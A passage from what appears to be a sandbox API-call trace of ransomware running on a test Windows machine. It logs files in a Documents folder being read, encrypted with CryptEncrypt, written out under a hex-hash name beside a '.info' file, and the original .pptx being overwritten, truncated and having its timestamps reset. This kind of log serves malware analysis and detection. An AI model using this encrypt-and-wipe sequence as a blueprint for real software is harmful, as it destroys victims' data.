lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C", lpFilePart=0x0) returned 0x48 [0074.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ea64999640b7281bb70298d9b8d2430c"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0074.962] GetFileType (hFile=0x380) returned 0x1 [0074.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.962] GetFileType (hFile=0x380) returned 0x1 [0074.962] ReadFile (in: hFile=0x36c, lpBuffer=0x231b1a0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x231b1a0*, lpNumberOfBytesRead=0x1bf5da28*=0x1078c, lpOverlapped=0x0) returned 1 [0074.963] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x232f1b8*, pdwDataLen=0x1bf5da80*=0x10780, dwBufLen=0x10780 | out: pbData=0x232f1b8*, pdwDataLen=0x1bf5da80*=0x10780) returned 1 [0074.963] WriteFile (in: hFile=0x380, lpBuffer=0x232f1b8*, nNumberOfBytesToWrite=0x10780, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x232f1b8*, lpNumberOfBytesWritten=0x1bf5da18*=0x10780, lpOverlapped=0x0) returned 1 [0074.965] ReadFile (in: hFile=0x36c, lpBuffer=0x231b1a0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x231b1a0*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0074.965] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x233f978*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x233f978*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.965] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x233f9c8*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x233f9c8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.965] WriteFile (in: hFile=0x380, lpBuffer=0x233fa18*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x233fa18*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0074.966] CloseHandle (hObject=0x380) returned 1 [0074.967] CloseHandle (hObject=0x36c) returned 1 [0074.967] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0074.967] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0074.967] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0074.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C", lpFilePart=0x0) returned 0x48 [0074.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0074.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ea64999640b7281bb70298d9b8d2430c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.967] GetFileType (hFile=0x36c) returned 0x1 [0074.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0074.967] GetFileType (hFile=0x36c) returned 0x1 [0074.967] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.969] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.970] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.971] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.972] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.972] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.972] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.972] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.972] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.972] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.972] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.973] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.973] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.973] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.996] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.013] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.013] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x790, lpOverlapped=0x0) returned 1 [0075.013] ReadFile (in: hFile=0x36c, lpBuffer=0x2341110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2341110*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.013] CloseHandle (hObject=0x36c) returned 1 [0075.017] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C.info", lpFilePart=0x0) returned 0x4d [0075.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ea64999640b7281bb70298d9b8d2430c.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.073] GetFileType (hFile=0x36c) returned 0x1 [0075.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.073] GetFileType (hFile=0x36c) returned 0x1 [0075.073] WriteFile (in: hFile=0x36c, lpBuffer=0x234d7d0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x234d7d0*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.074] CloseHandle (hObject=0x36c) returned 1 [0075.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0075.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.076] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mefxpwjrmsr9b4.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa60664e0, ftCreationTime.dwHighDateTime=0x1d4b0f5, ftLastAccessTime.dwLowDateTime=0xf0e32930, ftLastAccessTime.dwHighDateTime=0x1d5366a, ftLastWriteTime.dwLowDateTime=0xf0e32930, ftLastWriteTime.dwHighDateTime=0x1d5366a, nFileSizeHigh=0x0, nFileSizeLow=0x1078c)) returned 1 [0075.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0075.076] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", dwFileAttributes=0x80) returned 1 [0075.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0075.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.076] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mefxpwjrmsr9b4.pptx"), fInfoLevelId=0x0, lpFileInformation=0x23553c8 | out: lpFileInformation=0x23553c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xa60664e0, ftCreationTime.dwHighDateTime=0x1d4b0f5, ftLastAccessTime.dwLowDateTime=0xf0e32930, ftLastAccessTime.dwHighDateTime=0x1d5366a, ftLastWriteTime.dwLowDateTime=0xf0e32930, ftLastWriteTime.dwHighDateTime=0x1d5366a, nFileSizeHigh=0x0, nFileSizeLow=0x1078c)) returned 1 [0075.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0075.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mefxpwjrmsr9b4.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.077] GetFileType (hFile=0x36c) returned 0x1 [0075.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.077] GetFileType (hFile=0x36c) returned 0x1 [0075.077] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.122] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.123] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.124] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.125] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.125] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.126] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.127] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.128] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.128] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.129] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.130] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.131] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.131] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.132] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.133] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.134] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.134] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x800, lpOverlapped=0x0) returned 1 [0075.134] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.135] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.136] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.137] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.137] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.138] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.139] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.140] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.140] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.141] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.142] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.143] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.143] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.144] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.145] WriteFile (in: hFile=0x36c, lpBuffer=0x213a1f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x213a1f0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.146] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.147] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.147] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.147] SetEndOfFile (hFile=0x36c) returned 1 [0075.149] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.149] CloseHandle (hObject=0x36c) returned 1 [0075.149] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0075.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.149] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mefxpwjrmsr9b4.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.149] GetFileType (hFile=0x36c) returned 0x1 [0075.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.149] GetFileType (hFile=0x36c) returned 0x1 [0075.149] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.149] CloseHandle (hObject=0x36c) returned 1 [0075.150] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0075.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mefxpwjrmsr9b4.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.150] GetFileType (hFile=0x36c) returned 0x1 [0075.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.150] GetFileType (hFile=0x36c) returned 0x1 [0075.150] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.150] CloseHandle (hObject=0x36c) returned 1 [0075.150] GetFullPathNameW (in: 